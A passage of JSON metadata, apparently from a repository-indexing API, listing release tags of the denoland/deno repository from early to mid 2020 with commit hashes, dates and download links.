84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-